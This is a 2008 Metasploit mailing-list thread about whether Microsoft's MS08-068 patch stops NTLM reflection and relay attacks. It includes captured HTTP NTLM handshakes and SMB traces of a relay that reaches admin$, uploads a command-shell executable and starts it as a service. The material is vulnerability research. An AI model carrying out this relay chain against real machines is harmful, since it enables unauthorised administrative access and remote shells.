-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ArcSighter Elite wrote: > ArcSighter Elite wrote: >> ArcSighter Elite wrote: >>> H D Moore wrote: >>>> On Monday 22 December 2008, ArcSighter Elite wrote: >>>>> I came this morning with something. The MS08-67 patch when challenge >>>>> keys couldn't be replayed, affects also the other variants of the >>>>> attack, such as http 401 + WWW-Authenticate: NTLM, and the IMAP, POP >>>>> and SMTP versions? >>>> Supposedly it affects any component that initializes the security >>>> negotiation the "right" way, but only during a direct reflection attack. >>>> You can still relay to a third-party host regardless of protocol. >>>> -HD > > >>>> ------------------------------------------------------------------------ >>>> _______________________________________________ >>>> Framework-Hackers mailing list >>>> Framework-Hackers@spool.metasploit.com >>>> http://spool.metasploit.com/mailman/listinfo/framework-hackers >>> Well, this is how we go. >>> Before MS08-067: >>> Windows XP SP2 Spanish: >>> I totally owned. HTTP-based. No user intervention. No nothing. KIS2009 >>> doesn't block (find-socket). >>> I totally owned SMB-SMB attack, UNC share. >>> After MS08-067: >>> I owned too! But this time I got a prompt asking for username and >>> password; I mean, It doesn't automatically authenticate. >>> The SMB-SMB attack doesn't spawn my shell. > >>> Tell me what you think to proceed to XP SP3; although I think I will get >>> the same results. > >> Sorry about the typo, Is MS08-068 what I've applied not MS08-067-netapi. >> It's the right patch, and the results are above. > > Well, it surprisingly seems to work also in XP-Sp3 before and after the > patch too, the interesting prompt about username/password authentication > was my bad; i don' get prompt neither XP-SP3 nor XP-SP2; after I > rebooted SP2. > > > Here is what I've done (some hack in Python) > > 1. Force browser to authenticate HTTP 401 + WWW-Authenticate: NTLM > > Ex.: > (Here *.*.*.1 is server, *.*.*.2 client) > > GET / HTTP/1.1 > Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, > application/x-shockwave-flash, application/vnd.ms-excel, > application/vnd.ms-powerpoint, application/msword, */* > Accept-Language: es > Accept-Encoding: gzip, deflate > User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; > Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ) > Host: *.*.*.1 > Connection: Keep-Alive > > HTTP/1.1 401 Unauthorized > Content-Length: 0 > Content-Type: text/html > Server: Microsoft-IIS/6.0 > WWW-Authenticate: NTLM > Connection: keep-alive > > GET / HTTP/1.1 > Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, > application/x-shockwave-flash, application/vnd.ms-excel, > application/vnd.ms-powerpoint, application/msword, */* > Accept-Language: es > Accept-Encoding: gzip, deflate > User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; > Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ) > Host: *.*.*.1 > Connection: Keep-Alive > Authorization: NTLM TlR********AAB4IIogAAAAAAAAAAAAAAAAAAAAAFASgKAAAADw== > > //-- Avoid null sesions > > HTTP/1.1 401 Access Denied > Server: Microsoft-IIS/6.0 > WWW-Authenticate: NTLM > TlR********ABgAGADgAAAAHsgAA+vnrqY91YSEAAAAAAAAAACwALAA+AAAABQEoCgAAAA9XAFMAMgACAAYAVwBTADIAAQAGAFcAUwAyAAQABgB3AHMAMgADAAYAdwBzADIAAAAAAA== > > Content-Length: 0 > Content-Type: text/html > > GET / HTTP/1.1 > Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, > application/x-shockwave-flash, application/vnd.ms-excel, > application/vnd.ms-powerpoint, application/msword, */* > Accept-Language: es > Accept-Encoding: gzip, deflate > User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; > Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ) > Host: *.*.*.1 > Connection: Keep-Alive > Authorization: NTLM > TlR********AAAAGAAYAHwAAAAYABgAlAAAABQAFABIAAAAGgAaAFwAAAAGAAYAdgAAAAAAAACsAAAABYIAAgUBKAoAAAAPMQAwAC4AMQA1AC4AMwAuADgANgBBAGQAbQBpAG4AaQBzAHQAcgBhAGQAbwByAFcAUwAyADl4VTbp6F8qOXhVNunoXyo5eFU26ehfKrY5HrAdIbqrX4QPLLSy0y8RPgbMsVX5gg== > > > HTTP/1.1 200 OK > Content-Length: 92 > Connection: close > > 2. The basic replay attack (wireshark summaries only): > > //- Negotiating > 513 10.025748 *.*.*.1 *.*.*.2 > SMB Negotiate Protocol Request > > 516 10.026712 *.*.*.1 *.*.*.2 SMB Session Setup AndX Request, > NTLMSSP_NEGOTIATE > > /-- Authenticating > 520 10.029566 *.*.*.1 *.*.*.2 SMB Session Setup AndX Request, > NTLMSSP_AUTH, User: WS2\Administrador > > /-- Accessing IPC$ > 523 10.034183 *.*.*.1 *.*.*.2 SMB Tree Connect AndX Request, Path: > \\*.*.*.2\IPC$ > > /--Accesing admin$ > 531 10.040157 *.*.*.1 *.*.*.2 SMB Tree Connect AndX Request, Path: > \\*.*.*.2\admin$ > > /--Uploading exefile > 533 10.041749 *.*.*.1 *.*.*.2 SMB NT Create AndX Request, Path: > \cmdshellsrv.exe > > /--Accessing service control manager. > 561 11.066248 *.*.*.1 *.*.*.2 SMB NT Create AndX Request, FID: > 0x4000, > Path: \svcctl > > /-- well I got tired. > The rest you already know: binding, OpenSCManager, OpenService, > StartService => owning! > > So please give another point of view, because what I've realized here is > that MS didn't fix this properly! > > Sincerely. > > > > >
Excuse me for the one-person chat in here. But let me say that smb_relay of metasploit effectively fails after the patch. We already know that, the curious thing is my python script doesn't. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFJT/e1H+KgkfcIQ8cRAjfsAKD3yRwVgGblqWRTTRUUlr3EUSC5LACgyyiy m+VB+AjtoSDmm3sJsum8jZ4= =GHRB -----END PGP SIGNATURE----- _______________________________________________ Framework-Hackers mailing list Framework-Hackers@spool.metasploit.com http://spool.metasploit.com/mailman/listinfo/framework-hackers
